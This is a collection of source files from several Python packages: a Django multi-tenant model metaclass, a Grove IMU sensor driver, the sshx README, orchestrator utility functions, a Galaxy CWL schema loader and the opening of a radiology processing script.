dict(attrs, meta=meta(Meta, managed=Managed(settings.TENANT_MODEL)))
)
cls.references[model] = cls.reference(model, Meta)
else:
# Extract field related names prior to adding them to the model
# in order to validate them later on.
related_names = {}
for attr_name, attr in attrs.items():
if isinstance(attr, Field):
remote_field = get_remote_field(attr)
if remote_field:
related_names[attr.name or attr_name] = remote_field.related_name
for base in bases:
if isinstance(base, ModelBase) and base._meta.abstract:
for field in base._meta.local_fields:
remote_field = get_remote_field(field)
if remote_field:
related_names[field.name] = remote_field.related_name
for m2m in base._meta.local_many_to_many:
related_names[m2m.name] = get_remote_field(m2m).related_name
model = super_new(
cls, name, bases,
dict(attrs, Meta=meta(Meta, managed=Managed(settings.TENANT_MODEL)))
)
cls.references[model] = cls.reference(model, Meta, related_names)
opts = model._meta
# Validate related name of related fields.
for field in (opts.local_fields + get_private_fields(opts)):
remote_field = get_remote_field(field)
if remote_field:
cls.validate_related_name(model, get_remote_field_model(field), field)
# Replace and store the current `on_delete` value to
# make sure non-tenant models are not collected on
# deletion.
on_delete = remote_field.on_delete
if on_delete is not DO_NOTHING:
remote_field._on_delete = on_delete
remote_field.on_delete = DO_NOTHING
for m2m in opts.local_many_to_many:
m2m_remote_field = get_remote_field(m2m)
m2m_related_model = get_remote_field_model(m2m)
cls.validate_related_name(model, m2m_related_model, m2m)
through = m2m_remote_field.through
if (not isinstance(through, string_types) and
through._meta.auto_created):
# Replace the automatically created intermediary model
# by a TenantModelBase instance.
remove_from_app_cache(through)
# Make sure to clear the referenced model cache if
# we have contributed to it already.
if not isinstance(m2m_related_model, string_types):
clear_opts_related_cache(m2m_related_model)
m2m_remote_field.through = cls.intermediary_model_factory(m2m, model)
else:
cls.validate_through(model, m2m_related_model, m2m)
# Replace `ManagerDescriptor`s with `TenantModelManagerDescriptor`
# instances.
for manager in managers:
setattr(model, manager, TenantModelManagerDescriptor(model))
# Extract the specified related name if it exists.
try:
related_name = attrs.pop('TenantMeta').related_name
except (KeyError, AttributeError):
pass
else:
# Attach a descriptor to the tenant model to access the
# underlying model based on the tenant instance.
def attach_descriptor(tenant_model):
descriptor = TenantModelDescriptor(model)
setattr(tenant_model, related_name, descriptor)
app_label, model_name = settings.TENANT_MODEL.split('.')
lazy_class_prepared(app_label, model_name, attach_descriptor)
model._for_tenant_model = model
return model
@classmethod
def validate_related_name(cls, model, rel_to, field):
"""
Make sure that related fields pointing to non-tenant models specify
a related name containing a %(class)s format placeholder.
"""
if isinstance(rel_to, string_types):
lazy_related_operation(cls.validate_related_name, model, rel_to, field=field)
elif not isinstance(rel_to, TenantModelBase):
related_name = cls.references[model].related_names[field.name]
if (related_name is not None and
not (get_remote_field(field).is_hidden() or '%(class)s' in related_name)):
del cls.references[model]
remove_from_app_cache(model, quiet=True)
raise ImproperlyConfigured(
"Since `%s.%s` is originating from an instance "
"of `TenantModelBase` and not pointing to one "
"its `related_name` option must ends with a "
"'+' or contain the '%%(class)s' format "
"placeholder." % (model.__name__, field.name)
)
@classmethod
def validate_through(cls, model, rel_to, field):
"""
Make sure the related fields with a specified through points to an
instance of `TenantModelBase`.
"""
through = get_remote_field(field).through
if isinstance(through, string_types):
lazy_related_operation(cls.validate_through, model, through, field=field)
elif not isinstance(through, cls):
del cls.references[model]
remove_from_app_cache(model, quiet=True)
raise ImproperlyConfigured(
"Since `%s.%s` is originating from an instance of "
"`TenantModelBase` its `through` option must also be pointing "
"to one." % (model.__name__, field.name)
)
@classmethod
def intermediary_model_factory(cls, field, from_model):
to_model = get_remote_field_model(field)
opts = from_model._meta
from_model_name = opts.model_name
if to_model == from_model:
from_ = "from_%s" % from_model_name
to = "to_%s" % from_model_name
to_model = from_model
else:
from_ = from_model_name
if isinstance(to_model, string_types):
to = to_model.split('.')[-1].lower()
else:
to = to_model._meta.model_name
Meta = meta(
db_table=field._get_m2m_db_table(opts),
auto_created=from_model,
app_label=opts.app_label,
db_tablespace=opts.db_tablespace,
unique_together=(from_, to),
verbose_name="%(from)s-%(to)s relationship" % {'from': from_, 'to': to},
verbose_name_plural="%(from)s-%(to)s relationships" % {'from': from_, 'to': to}
)
name = str("%s_%s" % (opts.object_name, field.name))
field_opts = {'db_tablespace': field.db_tablespace}
if hasattr(field, 'db_constraint'):
field_opts['db_constraint'] = field.db_constraint
return type(name, (cls.tenant_model_class,), {
'Meta': Meta,
'__module__': from_model.__module__,
from_: models.ForeignKey(
from_model, on_delete=models.CASCADE, related_name="%s+" % name, **field_opts
),
to: models.ForeignKey(
to_model, on_delete=models.CASCADE, related_name="%s+" % name, **field_opts
),
})
@classmethod
def tenant_model_bases(cls, tenant, bases):
return tuple(
base.for_tenant(tenant) for base in bases
if isinstance(base, cls) and not base._meta.abstract
)
def abstract_tenant_model_factory(self, tenant):
if issubclass(self, TenantSpecificModel):
raise ValueError('Can only be called on non-tenant specific model.')
reference = self.references[self]
model = super(TenantModelBase, self).__new__(
self.__class__,
str("Abstract%s" % reference.object_name_for_tenant(tenant)),
(self,) + self.tenant_model_bases(tenant, self.__bases__), {
'__module__': self.__module__,
'Meta': meta(
reference.Meta,
abstract=True
),
tenant.ATTR_NAME: TenantDescriptor(tenant),
'_for_tenant_model': self
}
)
opts = model._meta
# Remove ourself from the parents chain and our descriptor
ptr = opts.parents.pop(self)
opts.local_fields.remove(ptr)
delattr(model, ptr.name)
# Rename parent ptr fields
for parent, ptr in opts.parents.items():
local_ptr = self._meta.parents[parent._for_tenant_model]
ptr.name = None
ptr.set_attributes_from_name(local_ptr.name)
# Add copy of the fields to cloak the inherited ones.
fields = (
copy.deepcopy(field) for field in (
self._meta.local_fields +
self._meta.local_many_to_many +
get_private_fields(self._meta)
)
)
for field in fields:
remote_field = get_remote_field(field)
if remote_field:
# Make sure related fields pointing to tenant models are
# pointing to their tenant specific counterpart.
remote_field_model = get_remote_field_model(field)
# Clear the field's cache.
if hasattr(field, '_related_fields'):
delattr(field, '_related_fields')
clear_cached_properties(field)
clear_cached_properties(remote_field)
if isinstance(remote_field_model, TenantModelBase):
if getattr(remote_field, 'parent_link', False):
continue
set_remote_field_model(field, self.references[remote_field_model].for_tenant(tenant))
# If no `related_name` was specified we make sure to
# define one based on the non-tenant specific model name.
if not remote_field.related_name:
remote_field.related_name = "%s_set" % self._meta.model_name
else:
clear_opts_related_cache(remote_field_model)
related_name = reference.related_names[field.name]
# The `related_name` was validated earlier to either end
# with a '+' sign or to contain %(class)s.
if related_name:
remote_field.related_name = related_name
else:
related_name = 'unspecified_for_tenant_model+'
if isinstance(field, models.ManyToManyField):
through = remote_field.through
remote_field.through = self.references[through].for_tenant(tenant)
# Re-assign the correct `on_delete` that was swapped for
# `DO_NOTHING` to prevent non-tenant model collection.
on_delete = getattr(remote_field, '_on_delete', None)
if on_delete:
remote_field.on_delete = on_delete
field.contribute_to_class(model, field.name)
# Some private fields such as GenericRelation are not correctly
# cloaked by `contribute_to_class`. Make sure to remove non-tenant
# private instances from tenant specific model options.
private_fields = get_private_fields(opts)
for private_field in get_private_fields(self._meta):
if private_field in private_fields:
private_fields.remove(private_field)
if private_field in opts.local_fields:
opts.local_fields.remove(private_field)
return model
def _prepare(self):
super(TenantModelBase, self)._prepare()
if issubclass(self, TenantSpecificModel):
for_tenant_model = self._for_tenant_model
# TODO: Remove when dropping support for Django < 1.10
if django.VERSION >= (1, 10):
for mgr_name, manager in for_tenant_model._meta.managers_map.items():
new_manager = copy.copy(manager)
new_manager.creation_counter = manager.creation_counter
self.add_to_class(mgr_name, new_manager)
else:
for _, mgr_name, manager in for_tenant_model._meta.concrete_managers:
new_manager = manager._copy_to_model(self)
new_manager.creation_counter = manager.creation_counter
self.add_to_class(mgr_name, new_manager)
# Since our declaration class is not one of our parents we must
# make sure our exceptions extend its.
for exception in self.exceptions:
subclass = subclass_exception(
str(exception),
(getattr(self, exception), getattr(for_tenant_model, exception)),
self.__module__,
self,
)
self.add_to_class(exception, subclass)
def for_tenant(self, tenant):
"""
Returns the model for the specific tenant.
"""
if issubclass(self, TenantSpecificModel):
raise ValueError('Can only be called on non-tenant specific model.')
reference = self.references[self]
opts = self._meta
name = reference.object_name_for_tenant(tenant)
# Return the already cached model instead of creating a new one.
model = get_model(opts.app_label, name.lower())
if model:
return model
meta_attrs = {
# TODO: Use `db_schema` once django #6148 is fixed.
'db_table': db_schema_table(tenant, self._meta.db_table),
'apps': TenantApps(tenant, getattr(reference.Meta, 'apps', apps)),
}
if (1, 10) <= django.VERSION < (2, 0):
meta_attrs['manager_inheritance_from_future'] = True
attrs = {
'__module__': self.__module__,
'Meta': meta(reference.Meta, **meta_attrs),
}
if opts.proxy:
attrs['_for_tenant_model'] = self
# In order to make sure the non-tenant model is part of the
# __mro__ we create an abstract model with stripped fields and
# inject it as the first base.
base = type(
str("Abstract%s" % reference.object_name_for_tenant(tenant)),
(self,), {
'__module__': self.__module__,
'Meta': meta(abstract=True),
}
)
# Remove ourself from the parents chain and our descriptor
base_opts = base._meta
ptr = base_opts.parents.pop(opts.concrete_model)
base_opts.local_fields.remove(ptr)
delattr(base, ptr.name)
bases = (base,) + self.tenant_model_bases(tenant, self.__bases__)
else:
bases = (self.abstract_tenant_model_factory(tenant),)
model = super(TenantModelBase, self).__new__(
TenantModelBase, str(name), bases, attrs
)
return model
def destroy(self):
"""
Remove all reference to this tenant model.
"""
if not issubclass(self, TenantSpecificModel):
raise ValueError('Can only be called on tenant specific model.')
remove_from_app_cache(self, quiet=True)
if not self._meta.proxy:
# Some fields (GenericForeignKey, ImageField) attach (pre|post)_init
# signals to their associated model even if they are abstract.
# Since this instance was created from an abstract base generated
# by `abstract_tenant_model_factory` we must make sure to disconnect
# all signal receivers attached to it so that it can be garbage collected.
disconnect_signals(self.__bases__[0])
def __unpickle_tenant_model_base(model, natural_key, abstract):
try:
manager = get_tenant_model()._default_manager
tenant = manager.get_by_natural_key(*natural_key)
tenant_model = model.for_tenant(tenant)
if abstract:
tenant_model = tenant_model.__bases__[0]
return tenant_model
except Exception:
logger = logging.getLogger('tenancy.pickling')
logger.exception('Failed to unpickle tenant model')
def __pickle_tenant_model_base(model):
if issubclass(model, TenantSpecificModel):
tenant = getattr(model, get_tenant_model().ATTR_NAME)
return (
__unpickle_tenant_model_base,
(model._for_tenant_model, tenant.natural_key(), model._meta.abstract)
)
return model.__name__
copyreg.pickle(TenantModelBase, __pickle_tenant_model_base)
class TenantModelDescriptor(object):
__slots__ = ['model']
def __init__(self, model):
self.model = model
def __get__(self, tenant, owner):
if not tenant:
return self
return tenant.models[self.model]._default_manager
class TenantModel(with_metaclass(TenantModelBase, models.Model)):
class Meta:
abstract = True
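# Usage sketch (illustrative only, not part of the original module): concrete
# tenant-aware models are declared by subclassing TenantModel; the model and
# field names below are assumptions chosen for the example.
#
#     class Article(TenantModel):
#         title = models.CharField(max_length=100)
#
# A tenant-bound class can then be obtained with `Article.for_tenant(tenant)`,
# or through the manager exposed by `TenantModelDescriptor` on the tenant instance.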
@receiver(models.signals.class_prepared)
def attach_signals(signal, sender, **kwargs):
"""
Re-attach signals to tenant models
"""
if issubclass(sender, TenantSpecificModel):
for signal, receiver_ in receivers_for_model(sender._for_tenant_model):
signal.connect(receiver_, sender=sender)
def validate_not_to_tenant_model(model, to, field):
"""
Make sure the `to` relationship is not pointing to an instance of
`TenantModelBase`.
"""
if isinstance(to, string_types):
lazy_related_operation(validate_not_to_tenant_model, model, to, field=field)
elif isinstance(to, TenantModelBase):
remove_from_app_cache(model, quiet=True)
raise ImproperlyConfigured(
"`%s.%s`'s `to` option can't point to an instance of "
"`TenantModelBase` since it's not one itself." % (
model.__name__, field.name
)
)
@receiver(models.signals.class_prepared)
def validate_relationships(signal, sender, **kwargs):
"""
Non-tenant models can't have relationships pointing to tenant models.
"""
if not isinstance(sender, TenantModelBase):
opts = sender._meta
# Don't validate auto-intermediary models since they are created
# before their origin model (from) and cloak the actual, user-defined
# improper configuration.
if not opts.auto_created:
for field in opts.local_fields:
remote_field = get_remote_field(field)
if remote_field:
validate_not_to_tenant_model(sender, get_remote_field_model(field), field)
for m2m in opts.local_many_to_many:
validate_not_to_tenant_model(sender, get_remote_field_model(m2m), m2m) | PypiClean |
/Seeed_grove.py-0.2.tar.gz/Seeed_grove.py-0.2/grove/grove_imu_9dof_icm20600_ak09918.py | from __future__ import division
from __future__ import print_function
from ctypes import *
from ctypes import util
import sys
from grove.i2c import Bus
ICM20600_I2C_ADDR0 = 0x68
ICM20600_I2C_ADDR1 = 0x69
ICM20600_RANGE_250_DPS, \
ICM20600_RANGE_500_DPS, \
ICM20600_RANGE_1K_DPS, \
ICM20600_RANGE_2K_DPS = 0, 1, 2, 3
ICM20600_RANGE_2G, \
ICM20600_RANGE_4G, \
ICM20600_RANGE_8G, \
ICM20600_RANGE_16G = 0, 1, 2, 3
ICM20600_GYRO_RATE_8K_BW_3281, \
ICM20600_GYRO_RATE_8K_BW_250, \
ICM20600_GYRO_RATE_1K_BW_176, \
ICM20600_GYRO_RATE_1K_BW_92, \
ICM20600_GYRO_RATE_1K_BW_41, \
ICM20600_GYRO_RATE_1K_BW_20, \
ICM20600_GYRO_RATE_1K_BW_10, \
ICM20600_GYRO_RATE_1K_BW_5 = 0, 1, 2, 3, 4, 5, 6, 7
ICM20600_ACC_RATE_4K_BW_1046,\
ICM20600_ACC_RATE_1K_BW_420, \
ICM20600_ACC_RATE_1K_BW_218, \
ICM20600_ACC_RATE_1K_BW_99, \
ICM20600_ACC_RATE_1K_BW_44, \
ICM20600_ACC_RATE_1K_BW_21, \
ICM20600_ACC_RATE_1K_BW_10, \
ICM20600_ACC_RATE_1K_BW_5 = 0, 1, 2, 3, 4, 5, 6, 7
ICM20600_ACC_AVERAGE_4, \
ICM20600_ACC_AVERAGE_8, \
ICM20600_ACC_AVERAGE_16,\
ICM20600_ACC_AVERAGE_32 = 0, 1, 2, 3
ICM20600_GYRO_AVERAGE_1, \
ICM20600_GYRO_AVERAGE_2, \
ICM20600_GYRO_AVERAGE_4, \
ICM20600_GYRO_AVERAGE_8, \
ICM20600_GYRO_AVERAGE_16, \
ICM20600_GYRO_AVERAGE_32, \
ICM20600_GYRO_AVERAGE_64, \
ICM20600_GYRO_AVERAGE_128 = 0, 1, 2, 3, 4, 5, 6, 7
ICM20600_ICM_SLEEP_MODE, \
ICM20600_ICM_STANDYBY_MODE, \
ICM20600_ICM_ACC_LOW_POWER, \
ICM20600_ICM_ACC_LOW_NOISE, \
ICM20600_ICM_GYRO_LOW_POWER, \
ICM20600_ICM_GYRO_LOW_NOISE, \
ICM20600_ICM_6AXIS_LOW_POWER,\
ICM20600_ICM_6AXIS_LOW_NOISE = 0, 1, 2, 3, 4, 5, 6, 7
__c_module = "akicm"
try:
_ = util.find_library(__c_module)
_akicm = cdll.LoadLibrary(_)
except Exception:
print("Error: module lib{}.so unusable, please install lib{}".
format(__c_module, __c_module))
sys.exit(1)
class ICM20600Cfg(Structure):
_fields_ = [("gyro_range", c_uint16), \
("gyro_rate", c_uint16), \
("gyro_aver", c_uint16), \
("acc_range", c_uint16), \
("acc_rate", c_uint16), \
("acc_aver", c_uint16), \
("power", c_uint16), \
("divider", c_uint16) ]
class GroveIMU9DOFICM20600(object):
def __init__(self, addr = ICM20600_I2C_ADDR1):
self._dev = _akicm.rpi_icm20600_alloc()
dev_path = "/dev/i2c-{}".format(Bus().bus)
icm20600_cfg = ICM20600Cfg(ICM20600_RANGE_2K_DPS,
ICM20600_GYRO_RATE_1K_BW_176,
ICM20600_GYRO_AVERAGE_1,
ICM20600_RANGE_16G,
ICM20600_ACC_RATE_1K_BW_420,
ICM20600_ACC_AVERAGE_4,
ICM20600_ICM_6AXIS_LOW_POWER,
0)
_akicm.rpi_icm20600_init(self._dev,
dev_path,
addr,
byref(icm20600_cfg))
def __del__(self):
_akicm.rpi_icm20600_free(self._dev)
def get_temperature(self):
t = c_double()
_akicm.rpi_icm20600_get_temperature(self._dev, byref(t))
return t.value
def get_accel(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_icm20600_get_accel(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
def get_gyro(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_icm20600_get_gyro(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
temperature = get_temperature
AK09918_I2C_ADDR = 0x0C
AK09918_POWER_DOWN = 0x00
AK09918_NORMAL = 0x01
AK09918_CONTINUOUS_10HZ = 0x02
AK09918_CONTINUOUS_20HZ = 0x04
AK09918_CONTINUOUS_50HZ = 0x06
AK09918_CONTINUOUS_100HZ = 0x08
AK09918_SELF_TEST = 0x10
AK09918_ERR_OK = 0 # OK
AK09918_ERR_DOR = 1 # data skipped
AK09918_ERR_NOT_RDY = 2 # not ready
AK09918_ERR_TIMEOUT = 3 # read/write timeout
AK09918_ERR_SELFTEST_FAILED = 4 # self test failed
AK09918_ERR_OVERFLOW = 5 # sensor overflow, means |x|+|y|+|z| >= 4912uT
AK09918_ERR_WRITE_FAILED = 6 # fail to write
AK09918_ERR_READ_FAILED = 7 # fail to read
class GroveIMU9DOFAK09918(object):
def __init__(self, addr = AK09918_I2C_ADDR):
self._dev = _akicm.rpi_ak09918_alloc()
dev_path = "/dev/i2c-{}".format(Bus().bus)
_akicm.rpi_ak09918_init(self._dev,
dev_path,
addr,
AK09918_NORMAL)
def __del__(self):
_akicm.rpi_ak09918_free(self._dev)
def mode(self, mode = None):
if mode is not None:
_akicm.rpi_ak09918_set_mode(self._dev, mode)
return _akicm.rpi_ak09918_get_mode(self._dev)
def reset(self):
return _akicm.rpi_ak09918_reset(self._dev)
def is_ready(self):
if _akicm.rpi_ak09918_is_ready(self._dev) == AK09918_ERR_OK:
return True
return False
def is_skip(self):
r = _akicm.rpi_ak09918_is_skip(self._dev)
return (r == AK09918_ERR_DOR)
def get_magnet(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_ak09918_read(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
def get_magnet_raw(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_ak09918_read_raw(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
def err_string(self, errval):
return _akicm.rpi_ak09918_err_string(errval)
Grove = GroveIMU9DOFICM20600
def main():
import time
print(\
""" Make sure Grove-IMU-9DOF-ICM20600-AK09918
inserted in one I2C slot of Grove-Base-Hat
""")
icm = GroveIMU9DOFICM20600()
ak = GroveIMU9DOFAK09918()
ak.mode(AK09918_CONTINUOUS_100HZ)
while True:
print("Temperature: {:.2f} C".format(icm.get_temperature()))
x, y, z = icm.get_accel()
print(" AX = %7.2f mg AY = %7.2f mg AZ = %7.2f mg" % (x, y, z))
x, y, z = icm.get_gyro()
print(" GX = %7.2f dps GY = %7.2f dps GZ = %7.2f dps" % (x, y, z))
if ak.is_ready():
# if ak.is_skip():
# print("*** call get_magnet() too slowly, data droped by AK09918")
x, y, z = ak.get_magnet()
print(" MX = %7.2f uT MY = %7.2f uT MZ = %7.2f uT" % (x, y, z))
time.sleep(1.0)
if __name__ == '__main__':
main() | PypiClean |
/sshx-0.33.5.tar.gz/sshx-0.33.5/README.md | # sshx (SSH eXtensions)
[](https://www.travis-ci.com/github/WqyJh/sshx)
[](https://codecov.io/gh/WqyJh/sshx)
[](https://raw.githubusercontent.com/WqyJh/sshx/master/LICENSE)
[](https://sshx.readthedocs.io/en/latest/)
sshx is a lightweight wrapper for the ssh/scp commands, with the following features:
- Remember your ssh accounts safely.
- Connect to your account without typing a password.
- Set jump hosts for your connection.
- Create ssh port forwardings without typing a password.
- Create a socks5 proxy via ssh dynamic port forwarding.
- Enable jump hosts for your port forwardings.
- Copy files from/to your account without typing a password.
- Enable jump hosts for your scp connection.
- Execute remote commands without typing a password.
- Enable jump hosts for executing commands.
- Install ssh public keys to remote servers.
- Enable jump hosts for public key installation.
Read full documentation on [ReadTheDocs](https://sshx.readthedocs.io/en/latest/).
## Installation
```bash
pip install sshx
```
### Supported platform
- Linux
- macOS
- WSL/cygwin/msys2 on Windows
**Attention:**
- Native Windows support was removed.
- Python 2 support was removed.
### Requirements
- Python >= 3.6
- openssh-clients: `ssh`, `scp`, `ssh-keygen`
## Quick Start
1. Initialization.
Perform only once after you've installed sshx.
```bash
sshx init
```
2. Adding an account.
```bash
sshx add myhost -l test@192.168.9.155
```
(This command will ask you to type your password, and sshx will store it in encrypted form.)
3. Connect to the account.
```bash
sshx connect myhost
```
| PypiClean |
/orchestrator_core-1.2.3rc3.tar.gz/orchestrator_core-1.2.3rc3/orchestrator/utils/functional.py |
import itertools
from typing import Callable, Iterable, List, Optional, Sequence, Set, TypeVar, Union
import more_itertools
import structlog
logger = structlog.get_logger(__name__)
def first_available_or_next(values: Iterable[int], start: int = 0) -> int:
"""Return first available value or the next logical value.
>>> first_available_or_next([0, 1, 3])
2
>>> first_available_or_next([0, 1, 2, 3])
4
>>> first_available_or_next([1, 2, 3])
0
>>> first_available_or_next([])
0
>>> first_available_or_next([0, 1, 3], start=11)
11
>>> first_available_or_next([0, 1, 3], start=4)
4
>>> first_available_or_next([], 22)
22
>>> first_available_or_next([1, 100, 101], 33)
33
>>> first_available_or_next([11, 22, 33, 44, 55], 33)
34
Args:
values: an iterable of integer values.
start: set starting value.
Returns:
First available value or next logical one.
"""
# +2 -> one +1 so the range of candidates extends up to and including max+1, and another +1 because range() excludes its stop value.
stop = max(values, default=0) + 2
if start >= stop:
stop = start + 1
return min(set(range(start, stop)) - set(values))
def orig(func: Callable) -> Callable:
"""Return the function wrapped by one or more decorators.
Args:
func: step function
Returns:
Undecorated step function for testing purposes.
"""
f = func
while hasattr(f, "__wrapped__"):
f = f.__wrapped__
return f
def join_cs(*args: Union[Iterable[str], str]) -> str:
"""Return comma separated string from one or more comma separated strings or iterables of strings.
It deals with empty strings and properly inserting comma's.
See: `test_join_cs` for examples.
Args:
args: One or more comma separated strings or iterables that should be joined.
Returns:
A comma separated string.
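Illustrative examples (inputs are assumptions; full coverage lives in `test_join_cs`):
>>> join_cs("a,b", ["c"])
'a,b,c'
>>> join_cs("a,b,", "", "c")
'a,b,c'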
"""
def to_iterable(value: Union[Iterable[str], str]) -> Iterable[str]:
if isinstance(value, str):
return filter(None, value.split(","))
return value
return ",".join(itertools.chain(*map(to_iterable, args)))
def expand_ranges(ranges: Sequence[Sequence[int]], inclusive: bool = False) -> List[int]:
"""Expand sequence of range definitions into sorted and deduplicated list of individual values.
A range definition is either a:
* one element sequence -> an individual value.
* two element sequence -> a range of values (either inclusive or exclusive).
>>> expand_ranges([[1], [2], [10, 12]])
[1, 2, 10, 11]
>>> expand_ranges([[1], [2], [10, 12]], inclusive=True)
[1, 2, 10, 11, 12]
>>> expand_ranges([[]])
Traceback (most recent call last):
...
ValueError: Expected 1 or 2 element list for range definition. Got 0 element list instead.
Resulting list is sorted::
>>> expand_ranges([[100], [1, 4]], inclusive=True)
[1, 2, 3, 4, 100]
Args:
ranges: sequence of range definitions
inclusive: are the stop values of the range definition inclusive or exclusive.
Returns:
Sorted deduplicated list of individual values.
Raises:
ValueError: if range definition is not a one or two element sequence.
"""
values: Set[int] = set()
for r in ranges:
if len(r) == 2:
values.update(range(r[0], r[1] + (1 if inclusive else 0)))
elif len(r) == 1:
values.add(r[0])
else:
raise ValueError(f"Expected 1 or 2 element list for range definition. Got {len(r)} element list instead.")
return sorted(values)
T = TypeVar("T")
def as_t(value: Optional[T]) -> T:
"""Cast `value` to non-Optional.
One often needs to assign a value that was typed as being `Optional` to a variable that is typed non-Optional. MyPy
rightfully takes issue with these assignments (strict Optional checking is default since MyPy 0.600) unless we
have explicitly determined these values to be not `None`. The most succinct way to do that is using an `assert`
statement::
x: Optional[int] = 7
assert x is not None
y: int = x
However that gets tedious pretty fast. One might be inclined to turn off strict Optional checking. However that
would be a bad decision; None values will percolate through data structures and cause issue at locations far from
where they originally came from. A better solution would be to fail right where the issue occurred but using a
somewhat more convenient syntax.
Some languages such as Kotlin provide the `as` operator:
.. code-block:: kotlin
val x: Int? = 7 // ? declaring the Int to be nullable
val y: Int = x as Int
That is the inspiration for this function. `t` referring to the type being wrapped in an `Optional`. Hence `as_t`
meaning `as the non-Optional type`.
The above Python example now becomes::
x: Optional[int] = 7
y: int = as_t(x)
`as_t` checks whether the value passed to it is not `None`, satisfying MyPy. If it happens to be `None` it raises a
`ValueError`, satisfying our requirement to fail at the location where we require the value to be not None and not
somewhere far down the code path.
Args:
value: `Optional` value to be casted to non-Optional
Returns:
non-Optional value.
Raises:
ValueError: in case `value` is `None`
"""
if value is None:
raise ValueError("Trying to cast a value to non-Optional type failed due to value being None.")
return value
def ireplace(iterable: Iterable[T], old: T, new: T) -> Iterable[T]:
"""Replace one or more occurrences of a specific value in an iterable with another value.
The 'i' prefix indicates 'iterable' and is there to distinguish it from other similar functions.
>>> list(ireplace(["1-10", "", "22"], "", "0"))
['1-10', '0', '22']
Args:
iterable: The iterable that needs to have a specific value replaced for all its occurrences.
old: The value in the iterable to replace.
new: The value to replace `old` with.
Returns:
A new iterable with `old` values replaced by `new` values
"""
yield from more_itertools.replace(iterable, lambda v: v == old, [new])
def to_ranges(i: Iterable[int]) -> Iterable[range]:
"""Convert a sorted iterable of ints to an iterable of range objects.
IMPORTANT: the iterable passed in should be sorted and not contain duplicate elements.
Examples::
>>> list(to_ranges([2, 3, 4, 5, 7, 8, 9, 45, 46, 47, 49, 51, 53, 54, 55, 56, 57, 58, 59, 60, 61]))
[range(2, 6), range(7, 10), range(45, 48), range(49, 50), range(51, 52), range(53, 62)]
Args:
i: sorted iterable
Yields:
range object for each consecutive set of integers
"""
# The trick here is the key function (the lambda one) that calculates the difference between an element of the
# iterable `i` and its corresponding enumeration value. For consecutive values in the iterable, this difference
# will be the same! All these values (those with the same difference) are grouped by the `groupby` function. We
# return the first and last element to construct a `range` object
for _, g in itertools.groupby(enumerate(i), lambda t: t[1] - t[0]):
group = list(g)
yield range(group[0][1], group[-1][1] + 1) | PypiClean |
/galaxy-lib-19.5.2.tar.gz/galaxy-lib-19.5.2/galaxy/tools/cwl/schema.py | import os
from collections import namedtuple
from six.moves.urllib.parse import urldefrag
from .cwltool_deps import (
ensure_cwltool_available,
load_tool,
LoadingContext,
schema_salad,
workflow,
)
RawProcessReference = namedtuple("RawProcessReference", ["process_object", "uri"])
ProcessDefinition = namedtuple("ProcessDefinition", ["process_object", "metadata", "document_loader", "avsc_names", "raw_process_reference"])
class SchemaLoader(object):
def __init__(self, strict=True):
self._strict = strict
self._raw_document_loader = None
@property
def raw_document_loader(self):
ensure_cwltool_available()
from cwltool.load_tool import jobloaderctx
return schema_salad.ref_resolver.Loader(jobloaderctx)
def raw_process_reference(self, path):
uri = "file://" + os.path.abspath(path)
fileuri, _ = urldefrag(uri)
return RawProcessReference(self.raw_document_loader.fetch(fileuri), uri)
def raw_process_reference_for_object(self, object, uri=None):
if uri is None:
uri = "galaxy://"
return RawProcessReference(object, uri)
def process_definition(self, raw_reference):
document_loader, avsc_names, process_object, metadata, uri = load_tool.validate_document(
self.raw_document_loader,
raw_reference.process_object,
raw_reference.uri,
)
process_def = ProcessDefinition(
process_object,
metadata,
document_loader,
avsc_names,
raw_reference,
)
return process_def
def tool(self, **kwds):
# cwl.workflow.defaultMakeTool() method was renamed to default_make_tool() in
# https://github.com/common-workflow-language/cwltool/commit/886a6ac41c685f20d39e352f9c657e59f3312265
try:
default_make_tool = workflow.default_make_tool
except AttributeError:
default_make_tool = workflow.defaultMakeTool
process_definition = kwds.get("process_definition", None)
if process_definition is None:
raw_process_reference = kwds.get("raw_process_reference", None)
if raw_process_reference is None:
raw_process_reference = self.raw_process_reference(kwds["path"])
process_definition = self.process_definition(raw_process_reference)
args = {"strict": self._strict}
make_tool = kwds.get("make_tool", default_make_tool)
if LoadingContext is not None:
args["construct_tool_object"] = make_tool
loading_context = LoadingContext(args)
tool = load_tool.make_tool(
process_definition.document_loader,
process_definition.avsc_names,
process_definition.metadata,
process_definition.raw_process_reference.uri,
loading_context,
)
else:
tool = load_tool.make_tool(
process_definition.document_loader,
process_definition.avsc_names,
process_definition.metadata,
process_definition.raw_process_reference.uri,
make_tool,
args
)
return tool
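# Usage sketch (illustrative only; the file path below is an assumption): a CWL
# tool can be loaded directly from a path, or via a pre-resolved process definition.
#
#     loader = SchemaLoader()
#     tool = loader.tool(path="my_tool.cwl")
#
#     # or, reusing the intermediate objects:
#     reference = loader.raw_process_reference("my_tool.cwl")
#     definition = loader.process_definition(reference)
#     tool = loader.tool(process_definition=definition)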
schema_loader = SchemaLoader()
non_strict_schema_loader = SchemaLoader(strict=False) | PypiClean |
/pyluna-radiology-0.3.3.tar.gz/pyluna-radiology-0.3.3/luna/radiology/refined_table/generate.py | import glob, shutil, os, uuid, subprocess, sys, argparse, time
import click
from checksumdir import dirhash
from luna.common.CodeTimer import CodeTimer
from luna.common.config import ConfigSet
from luna.common.sparksession import SparkConfig
from luna.common.custom_logger import init_logger
import luna.common.constants as const
from pyspark.sql import functions as F
from pyspark.sql.types import ArrayType,StringType,StructType,StructField
logger = init_logger()
logger.info("Starting process_scan_job.py")
APP_CFG='APP_CFG'
def validate_file_ext(ctx, param, value):
if value not in ['mhd','nrrd']:
raise click.UsageError("file_ext should be one of mhd|nrrd")
else:
return value.lower()
@click.command()
@click.option('-d', '--hdfs_uri', default='file:///', help='hdfs URI uri e.g. hdfs://localhost:8020', required=True)
@click.option('-c', '--custom_preprocessing_script', help="Path to python file to execute in the working directory", required=True)
@click.option('-t', '--tag', default = 'default', help="Provenance tag")
@click.option('-f', '--config_file', default = 'config.yaml', help="config file")
@click.option('-i', '--uid', help = "SeriesInstanceUID")
@click.option('-p', '--project_name', help="MIND project address")
